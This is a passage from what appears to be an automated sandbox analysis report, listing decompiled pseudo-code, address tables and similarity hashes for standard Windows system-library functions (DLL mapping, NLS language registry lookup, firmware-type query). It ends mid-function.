                                                    0x01227ed6
                                                    0x01227ed6
                                                    0x01227ed6
                                                    0x01227ede
                                                    0x01227ee3
                                                    0x012798e3
                                                    0x012798f0
                                                    0x01279902
                                                    0x012798f2
                                                    0x012798fb
                                                    0x012798fb
                                                    0x01279907
                                                    0x0127991d
                                                    0x0127991d
                                                    0x01279907
                                                    0x012798e3
                                                    0x01227ef0
                                                    0x01227f14
                                                    0x01227f14
                                                    0x01227f1e
                                                    0x01279946
                                                    0x01227f24
                                                    0x01227f24
                                                    0x01227f24
                                                    0x01227f2c
                                                    0x0127996a
                                                    0x01279975
                                                    0x01279975
                                                    0x0127997e
                                                    0x01279993
                                                    0x01279993
                                                    0x0127997e
                                                    0x00000000
                                                    0x01227ef2
                                                    0x01227efc
                                                    0x01227f0a
                                                    0x01227f0e
                                                    0x01279933
                                                    0x00000000
                                                    0x01279933
                                                    0x00000000
                                                    0x01227f0e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01227eb1

                                                    Strings
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 012798A2
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01279891
                                                    • LdrpCompleteMapModule, xrefs: 01279898
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 62db69fce058e8459b35627881f72db8126d035891b6f8ef1e0ce99497254099
                                                    • Instruction ID: e3cf7e4e32c9a0d8b08a4203999c23e750151f46358bc147490b6b41d08cbf4d
                                                    • Opcode Fuzzy Hash: 62db69fce058e8459b35627881f72db8126d035891b6f8ef1e0ce99497254099
                                                    • Instruction Fuzzy Hash: 4C510271628746EBEB22CF5CC845B2A7BE4BF20324F040559EA519B3E1D770ED40CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0121E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E0121E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0121F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012595D0();
						}
						if(_t78 != 0) {
							L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0125FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0125BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01259600();
					if(_t97 < 0) {
						goto L6;
					}
					E0125BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0121F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0125BB40(_t83, _t102 + 0x24, _t78);
								if(L012243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0125BB40(_t84, _t102 + 0x24, _t94);
									if(L012243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                    0x0121e620
                                                    0x0121e628
                                                    0x0121e62f
                                                    0x0121e631
                                                    0x0121e635
                                                    0x0121e637
                                                    0x0121e63e
                                                    0x01275503
                                                    0x01275503
                                                    0x0121e64c
                                                    0x0121e64c
                                                    0x0121e651
                                                    0x00000000
                                                    0x00000000
                                                    0x0121e661
                                                    0x0121e665
                                                    0x0127542a
                                                    0x0121e715
                                                    0x0121e71a
                                                    0x0121e71c
                                                    0x0121e720
                                                    0x0121e720
                                                    0x0121e727
                                                    0x0121e736
                                                    0x0121e736
                                                    0x0121e743
                                                    0x0121e743
                                                    0x0121e673
                                                    0x0121e678
                                                    0x0121e67d
                                                    0x0121e682
                                                    0x0121e685
                                                    0x0121e692
                                                    0x0121e69b
                                                    0x0121e6a3
                                                    0x0121e6ad
                                                    0x0121e6b1
                                                    0x0121e6b2
                                                    0x0121e6bb
                                                    0x0121e6bf
                                                    0x0121e6c0
                                                    0x0121e6c8
                                                    0x0121e6cc
                                                    0x0121e6d5
                                                    0x0121e6d9
                                                    0x00000000
                                                    0x00000000
                                                    0x0121e6e5
                                                    0x0121e6ea
                                                    0x0121e6f9
                                                    0x0121e70b
                                                    0x0121e70f
                                                    0x01275439
                                                    0x0127545e
                                                    0x0127545e
                                                    0x00000000
                                                    0x0127545e
                                                    0x0127543b
                                                    0x0127543e
                                                    0x01275440
                                                    0x01275445
                                                    0x01275472
                                                    0x01275475
                                                    0x0127548d
                                                    0x01275493
                                                    0x012754a9
                                                    0x00000000
                                                    0x00000000
                                                    0x012754ab
                                                    0x012754b4
                                                    0x012754bc
                                                    0x012754c8
                                                    0x012754de
                                                    0x012754fb
                                                    0x012754e0
                                                    0x012754e6
                                                    0x012754eb
                                                    0x012754eb
                                                    0x012754de
                                                    0x00000000
                                                    0x012754bc
                                                    0x01275477
                                                    0x0127547a
                                                    0x01275480
                                                    0x01275483
                                                    0x01275486
                                                    0x0127548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0127548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01275447
                                                    0x01275447
                                                    0x01275447
                                                    0x01275447
                                                    0x0127544e
                                                    0x00000000
                                                    0x00000000
                                                    0x01275450
                                                    0x01275452
                                                    0x01275455
                                                    0x0127545a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0127545c
                                                    0x0127546a
                                                    0x0127546d
                                                    0x0127546f
                                                    0x00000000
                                                    0x0127546f
                                                    0x0121e70f

                                                    Strings
                                                    • InstallLanguageFallback, xrefs: 0121E6DB
                                                    • @, xrefs: 0121E6C0
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0121E68C
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: a50cf85ff5baf5b8f3a83a6f9e109fb6bdaa0b5771a1d3a27a30a9bb2f16e042
                                                    • Instruction ID: b9ab93b3cd746989fc1a8540e4f9ba7c514d25dfc0d8f11cd0be511d2bc2c4fc
                                                    • Opcode Fuzzy Hash: a50cf85ff5baf5b8f3a83a6f9e109fb6bdaa0b5771a1d3a27a30a9bb2f16e042
                                                    • Instruction Fuzzy Hash: A151A1725283469BD715DF28C890A7BB7E8FF98614F05092EFA85D7240F774DA04C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012DE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E012DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E012DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E012DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E012DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01259730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E012DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E012DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01259730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E012DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E012DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01232280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0122B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0122FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01237D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E012CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                    0x012de547
                                                    0x012de549
                                                    0x012de54f
                                                    0x012de553
                                                    0x012de557
                                                    0x012de55a
                                                    0x012de55c
                                                    0x012de55f
                                                    0x012de561
                                                    0x012de567
                                                    0x012de56b
                                                    0x012de7e2
                                                    0x00000000
                                                    0x012de571
                                                    0x012de575
                                                    0x012de577
                                                    0x012de57b
                                                    0x012de57c
                                                    0x012de57d
                                                    0x012de57e
                                                    0x012de57f
                                                    0x012de588
                                                    0x012de58f
                                                    0x012de591
                                                    0x012de592
                                                    0x012de592
                                                    0x012de596
                                                    0x012de59e
                                                    0x012de5a0
                                                    0x012de5a6
                                                    0x012de61d
                                                    0x012de61d
                                                    0x012de621
                                                    0x012de623
                                                    0x012de630
                                                    0x012de630
                                                    0x012de7e6
                                                    0x012de7eb
                                                    0x012de7ed
                                                    0x012de7f4
                                                    0x012de7fa
                                                    0x012de7ff
                                                    0x012de7ff
                                                    0x012de80a
                                                    0x012de812
                                                    0x012de812
                                                    0x012de5ab
                                                    0x012de5b4
                                                    0x012de5b9
                                                    0x012de5be
                                                    0x012de5c0
                                                    0x012de5c2
                                                    0x012de5c8
                                                    0x012de5c9
                                                    0x012de5cb
                                                    0x012de5cc
                                                    0x012de5d5
                                                    0x012de5e4
                                                    0x012de5f1
                                                    0x012de5f8
                                                    0x012de5f8
                                                    0x012de5d5
                                                    0x012de602
                                                    0x012de616
                                                    0x012de63d
                                                    0x012de644
                                                    0x012de64d
                                                    0x012de652
                                                    0x012de657
                                                    0x012de659
                                                    0x012de65b
                                                    0x012de661
                                                    0x012de662
                                                    0x012de664
                                                    0x012de665
                                                    0x012de66e
                                                    0x012de67d
                                                    0x012de68a
                                                    0x012de691
                                                    0x012de691
                                                    0x012de66e
                                                    0x012de6b0
                                                    0x00000000
                                                    0x012de6b6
                                                    0x012de6bd
                                                    0x012de6c7
                                                    0x012de6d7
                                                    0x012de6d9
                                                    0x012de6db
                                                    0x012de6de
                                                    0x012de6e3
                                                    0x012de6f3
                                                    0x012de6fc
                                                    0x012de700
                                                    0x012de700
                                                    0x012de704
                                                    0x012de70a
                                                    0x012de70a
                                                    0x012de713
                                                    0x012de716
                                                    0x012de719
                                                    0x012de720
                                                    0x012de761
                                                    0x012de76b
                                                    0x012de774
                                                    0x012de77a
                                                    0x012de77a
                                                    0x012de78a
                                                    0x012de791
                                                    0x012de799
                                                    0x012de79b
                                                    0x012de79f
                                                    0x012de7aa
                                                    0x012de7c0
                                                    0x012de7ac
                                                    0x012de7b2
                                                    0x012de7b9
                                                    0x012de7b9
                                                    0x012de7c7
                                                    0x012de806
                                                    0x00000000
                                                    0x012de7c9
                                                    0x012de7d1
                                                    0x012de7d8
                                                    0x00000000
                                                    0x012de7d8
                                                    0x00000000
                                                    0x00000000
                                                    0x012de722
                                                    0x012de72e
                                                    0x012de748
                                                    0x012de74c
                                                    0x012de754
                                                    0x012de756
                                                    0x012de75c
                                                    0x012de75c
                                                    0x00000000
                                                    0x012de75c
                                                    0x012de758
                                                    0x012de758
                                                    0x00000000
                                                    0x012de758
                                                    0x012de750
                                                    0x00000000
                                                    0x00000000
                                                    0x012de752
                                                    0x00000000
                                                    0x012de752
                                                    0x012de730
                                                    0x012de735
                                                    0x012de73d
                                                    0x012de73f
                                                    0x00000000
                                                    0x00000000
                                                    0x012de741
                                                    0x012de741
                                                    0x00000000
                                                    0x012de741
                                                    0x012de739
                                                    0x00000000
                                                    0x00000000
                                                    0x012de73b
                                                    0x00000000
                                                    0x012de73b
                                                    0x012de722
                                                    0x012de720
                                                    0x012de6b0
                                                    0x012de618
                                                    0x00000000
                                                    0x012de618

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction ID: b778190fa1f603d7ef1c9074a0db38443fd875d517be086c2ea5cca51c744769
                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction Fuzzy Hash: 7191C3716243429FE764CF29C841B2BBBE5BF84714F15892DFA95CB280E774E904CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012951BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E012951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x12f05f0);
				E0126D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0122EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012953CA(0);
						return E0126D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0125F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01233690(1, _t117, 0x11f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0125AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01234620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0125AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0129500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01259860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                    0x012951be
                                                    0x012951c3
                                                    0x012951c8
                                                    0x012951cd
                                                    0x012951d0
                                                    0x012951d3
                                                    0x012951d8
                                                    0x012951db
                                                    0x012951de
                                                    0x012951e0
                                                    0x012951e3
                                                    0x012951e6
                                                    0x012951e8
                                                    0x01295342
                                                    0x01295351
                                                    0x01295356
                                                    0x0129535a
                                                    0x01295360
                                                    0x01295363
                                                    0x01295366
                                                    0x01295369
                                                    0x01295369
                                                    0x0129536b
                                                    0x0129536b
                                                    0x01295370
                                                    0x012953a3
                                                    0x012953a4
                                                    0x012953a6
                                                    0x012953ab
                                                    0x012953ab
                                                    0x012953ae
                                                    0x012953ae
                                                    0x012953b5
                                                    0x012953bf
                                                    0x012953bf
                                                    0x01295375
                                                    0x01295396
                                                    0x012953a0
                                                    0x012953a0
                                                    0x00000000
                                                    0x01295396
                                                    0x01295377
                                                    0x01295379
                                                    0x0129537f
                                                    0x0129538c
                                                    0x01295390
                                                    0x00000000
                                                    0x01295390
                                                    0x012951ee
                                                    0x012951f1
                                                    0x01295301
                                                    0x01295310
                                                    0x01295315
                                                    0x01295318
                                                    0x0129531b
                                                    0x01295320
                                                    0x0129532e
                                                    0x01295331
                                                    0x00000000
                                                    0x01295331
                                                    0x01295328
                                                    0x01295329
                                                    0x00000000
                                                    0x01295329
                                                    0x012951fa
                                                    0x01295235
                                                    0x01295236
                                                    0x01295239
                                                    0x0129523f
                                                    0x01295240
                                                    0x01295241
                                                    0x01295242
                                                    0x01295246
                                                    0x01295247
                                                    0x0129524e
                                                    0x01295251
                                                    0x01295267
                                                    0x01295269
                                                    0x0129526e
                                                    0x0129527d
                                                    0x0129527e
                                                    0x01295281
                                                    0x01295282
                                                    0x01295287
                                                    0x01295288
                                                    0x0129528a
                                                    0x0129528f
                                                    0x01295294
                                                    0x00000000
                                                    0x00000000
                                                    0x0129529a
                                                    0x0129529c
                                                    0x0129529e
                                                    0x0129529e
                                                    0x012952a4
                                                    0x012952b0
                                                    0x00000000
                                                    0x00000000
                                                    0x012952ba
                                                    0x012952bc
                                                    0x012952bc
                                                    0x012952d4
                                                    0x012952d9
                                                    0x012952dc
                                                    0x012952e1
                                                    0x00000000
                                                    0x00000000
                                                    0x012952e7
                                                    0x012952f4
                                                    0x00000000
                                                    0x012952f4
                                                    0x01295270
                                                    0x00000000
                                                    0x01295270
                                                    0x012951fc
                                                    0x012951fd
                                                    0x01295202
                                                    0x01295203
                                                    0x01295205
                                                    0x0129520a
                                                    0x0129520f
                                                    0x00000000
                                                    0x00000000
                                                    0x0129521b
                                                    0x01295226
                                                    0x0129522b
                                                    0x0129521d
                                                    0x0129521d
                                                    0x01295222
                                                    0x01295222
                                                    0x0129522d
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 446b88a731360cbd195b3997768f24af346bda4028992c1c12ae5bb6d8abdac3
                                                    • Instruction ID: 7eb1e718b875167f2f8dcc4f1ae3bc55a243f1cef3cc774c0ffdc0fd9128e7ad
                                                    • Opcode Fuzzy Hash: 446b88a731360cbd195b3997768f24af346bda4028992c1c12ae5bb6d8abdac3
                                                    • Instruction Fuzzy Hash: F7516BB1E206099FDF26DFA8C981BADBBF8BB48700F14406EE649EB251D7719940CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0121B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E0121B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x12ef7a8);
				E0126D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0126D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0125D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
